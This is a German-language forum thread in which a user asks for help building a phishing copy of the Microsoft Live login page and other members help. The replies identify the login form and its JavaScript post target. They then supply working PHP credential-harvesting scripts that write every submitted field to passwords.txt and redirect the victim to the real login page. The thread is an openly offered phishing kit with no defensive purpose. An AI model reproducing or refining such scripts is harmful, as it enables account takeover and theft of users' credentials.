1. #1

    Registriert seit
    17.07.2013
    Beiträge
    3
    Thanked 0 Times in 0 Posts

    Standard Phishingseite erstellen

    Hallo,
    kann mir jemand helfen beim Phishen dieser Seite.
    Ich finde im Seitenquelltext das Wort "action" nicht, ich muss jedoch den Seitenquelltext bearbeiten um die Phishing Seite zu erstellen.
    Kennt sich jemand damit aus und kann mir sagen was ich stattdessen machen soll.
    Danke im Voraus
    Geändert von testo1471 (31.07.2013 um 19:24 Uhr)

  2. #2

    Registriert seit
    18.03.2013
    Beiträge
    481
    Thanked 264 Times in 168 Posts

    Standard AW: Phishing

    Versteh ich das richtig, dass du das Formular im Quelltext suchst?

    HTML-Code:
    <div id="rightTD">
    <form novalidate="" method="POST" target="_top" name="f1">
    <div class="section">
    <div id="idTd_Tile_Error" style="display: none;" aria-live="assertive" aria-relevant="text" aria-atomic="true">
    <div id="idTd_Tile_ErrorMsg_Login" class="errorDiv first"></div>
    </div>
    <div id="idTd_PWD_Error" style="display: none;" aria-live="assertive" aria-relevant="text" aria-atomic="true">
    <div id="idTd_PWD_ErrorMsg_Username" class="errorDiv first">Generic Password Error Message</div>
    </div>
    <div id="idTd_PWD_UsernameLbl" class="row label">
    <span id="idLbl_PWD_Username" role="heading">
    Microsoft-Konto
    <a id="idA_MSAccLearnMore" href="http://go.microsoft.com/fwlink/?LinkID=254486" target="_blank">Was ist das?</a>
    </span>
    </div>
    <div id="idDiv_PWD_UsernameTb" class="row textbox">
    <div style="position: relative; width: 100%;">
    <input id="i0116" class="ltr_override" type="email" lang="en" name="login" maxlength="113" aria-labelledby="idLbl_PWD_Username">
    <div class="phholder" style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;">
    <div id="idDiv_PWD_UsernameExample" class="placeholder ltr_override" aria-hidden="true" style="cursor: text;">jemand@example.com</div>
    </div>
    </div>
    </div>
    <div id="idTd_PWD_Error_Password" style="display: none;" aria-live="assertive" aria-relevant="text" aria-atomic="true">
    <div id="idTd_PWD_ErrorMsg_Password" class="errorDiv"></div>
    </div>
    <div id="idDiv_PWD_PasswordTb" class="row textbox">
    <div style="position: relative; width: 100%;">
    <input id="i0118" type="password" name="passwd" autocomplete="off" aria-labelledby="idDiv_PWD_PasswordExample">
    <div class="phholder" style="position: absolute; top: 0px; left: 0px; z-index: 5; width: 100%;">
    <div id="idDiv_PWD_PasswordExample" class="placeholder" aria-hidden="true" style="cursor: text;">Kennwort</div>
    </div>
    </div>
    </div>
    <div id="idTd_PWD_KMSI_Cb">
    <input id="idChkBx_PWD_KMSI0Pwd" type="checkbox" name="KMSI" value="1">
    <label id="idLbl_PWD_KMSI_Cb" for="idChkBx_PWD_KMSI0Pwd">Angemeldet bleiben</label>
    </div>
    </div>
    <div id="idTd_PWD_SubmitCancelTbl" class="section">
    <input id="idSIButton9" class="default" type="submit" name="SI" value="Anmelden">
    </div>
    <div class="section">
    <div id="idDiv_PWD_ForgotPassword" class="row small">
    <a id="idA_PWD_ForgotPassword" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26ct%3d1375290880%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252Fdefault.aspx%26id%3d64855%26cbcxt%3dmai%26snsc%3d1%26vv%3d1450%26mkt%3dDE-DE%26lc%3d1031&id=64855&uiflavor=web&mkt=DE-DE&lc=1031&bk=1375296336">Können Sie nicht auf Ihr Konto zugreifen?</a>
    </div>
    <div id="idTD_PWD_SwitchToOTCLink" class="row small">
    <a id="idA_PWD_SwitchToOTC" href="">Melden Sie sich mit einem Einmalcode an</a>
    </div>
    </div>
    </form>
    </div>
    Such immer nach <form oder nutz Firebug, um Formulare auf einer Seite zu finden. Ist in jedem Fall besser als nach "action" den Quelltext zu durchsuchen.



    [www.piratenpartei.de]
    "Krieg ist Frieden; Freiheit ist Sklaverei; Unwissenheit ist Stärke"

  3. The Following User Says Thank You to xOneDirectionx For This Useful Post:

    testo1471 (31.07.2013)

  4. #3

    Registriert seit
    17.07.2013
    Beiträge
    3
    Thanked 0 Times in 0 Posts

    Standard AW: Phishing

    Danke für eine Antwort, aber wo soll ich denn jetzt den Namen der php Datei hinschreiben ?
    Das ganze funktioniert so, ich erstelle mir eine Webspace und lade auf meinem FTP Server
    den Index und die php datei.
    Der Index ist da um die Originale Seite darzustellen, und die php Datei um die eingegebenen Daten zu Speichern.
    So werden nach dem Login, die Daten auf meinem FTP Server gespeichert.
    Hier ist der Script von der FTP Datei.

    PHP-Code:
    <?php
    header
    ("Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1375297824&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1031&id=64855&mkt=de-de&cbcxt=mai&snsc=1 ");
    $handle fopen("passwords.txt""a");
    foreach(
    $_POST as $variable => $value) {
    fwrite($handle$variable);
    fwrite($handle"=");
    fwrite($handle$value);
    fwrite($handle"\r\n");
    }
    fwrite($handle"\r\n");
    fclose($handle);
    exit;
    ?>
    Ich muss damit die Daten gespeichert werden, den Namen der php Datei an einer bestimmten Stelle einfügen.
    Diese Stelle findet man meistens in dem man Quelltext mit "action" durchsucht.
    Jedoch finde ich es in diesem Fall nicht.

  5. #4
    Avatar von DMW007
    Registriert seit
    15.11.2011
    Beiträge
    6.081
    Thanked 9.119 Times in 2.996 Posts
    Blog Entries
    5

    Standard AW: Phishingseite erstellen

    Der action-Parameter wird nur benötigt, wenn die Daten an ein anderes Script gesendet werden sollen. Dementsprechend ists keine besonders gute Idee danach zu suchen. Wenn dann sollte man eher nach Formularen ausschau halten.
    In dem Fall ist es aber auch nicht einfach mit Parameter ändern speichern & fertig getan. Das Formular wird via JS erzeugt. Die Ziel-URL ist vermutlich diese Variable im JS auf der Loginseite eingebettet:

    urlPost:'https://login.live.com/ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1375290880&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1031&id=64855&mkt=de-de&cbcxt=mai&snsc=1&bk=1375300465'
    

    (Ungetestet).

    Und von der Logik her sollte dein Script die Daten erst in die Log schreiben und dann weiterleiten. Funktioniert in dem Fall zwar auch aber ist logisch besser. Wobei hier eine DB auch sinnvoller wäre als eine Datei.


  6. The Following User Says Thank You to DMW007 For This Useful Post:

    testo1471 (31.07.2013)

  7. #5

    Registriert seit
    17.07.2013
    Beiträge
    3
    Thanked 0 Times in 0 Posts

    Standard AW: Phishingseite erstellen

    Danke für die Antwort, wäre nett wenn du mir weiterhin helfen könntest.
    Wie müssten die Scripts denn aussehen, damit alles funktioniert?
    Geändert von testo1471 (31.07.2013 um 22:39 Uhr)

  8. #6

    Registriert seit
    18.03.2013
    Beiträge
    481
    Thanked 264 Times in 168 Posts

    Standard AW: Phishingseite erstellen

    Da du die Header-Funktion in PHP nicht mehr nutzen kannst, nachdem eine Ausgabe stattgefunden hat, würde ich hier auf eine Weiterleitung per HTML setzen.

    PHP-Code:
     <?php
    $handle 
    fopen("passwords.txt""a");
    foreach(
    $_POST as $variable => $value) {
    fwrite($handle$variable);
    fwrite($handle"=");
    fwrite($handle$value);
    fwrite($handle"\r\n");
    }
    fwrite($handle"\r\n");
    fclose($handle);
    echo 
    '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="refresh" content="0; URL=https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1375297824&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1031&id=64855&mkt=de-de&cbcxt=mai&snsc=1"></head><body></body></html>';
    ?>
    Sollte eigentlich selbst erklärend sein. Das 0 im META-Content ist die Zeit in Sekunden, nach der weitergeleitet wird. Hier also 0.



    [www.piratenpartei.de]
    "Krieg ist Frieden; Freiheit ist Sklaverei; Unwissenheit ist Stärke"

  9. #7
    Avatar von DMW007
    Registriert seit
    15.11.2011
    Beiträge
    6.081
    Thanked 9.119 Times in 2.996 Posts
    Blog Entries
    5

    Standard AW: Phishingseite erstellen

    Was für eine Ausgabe? Es gibt keine Ausgabe in diesem Script. Die ist auch nicht nötig, weil es lediglich die Formulardaten loggen soll. Also kann er am Header rumspielen wie er lustig ist.

    Zitat Zitat von testo1471 Beitrag anzeigen
    Wie müssten die Scripts denn aussehen, damit alles funktioniert?
    Ich habe im Post oben erklärt was zutun ist.


Ähnliche Themen

  1. Wie einen bot erstellen ?
    Von koppaz1337 im Forum Knuddels Programmierung
    Antworten: 25
    Letzter Beitrag: 21.07.2013, 18:07
  2. Logos erstellen
    Von xKhalifa im Forum Angebot & Nachfrage
    Antworten: 1
    Letzter Beitrag: 16.01.2013, 22:17
  3. Linux ZIP-Dateien erstellen
    Von Minecraft im Forum Linux
    Antworten: 1
    Letzter Beitrag: 22.05.2012, 13:11
  4. Win7 Image erstellen
    Von DANP im Forum Windows
    Antworten: 4
    Letzter Beitrag: 12.05.2012, 18:44
  5. BrickForce Map erstellen.
    Von Shane im Forum Brick-Force
    Antworten: 3
    Letzter Beitrag: 10.05.2012, 10:34
Diese Seite nutzt Cookies, um das Nutzererlebnis zu verbessern. Klicken Sie hier, um das Cookie-Tracking zu deaktivieren.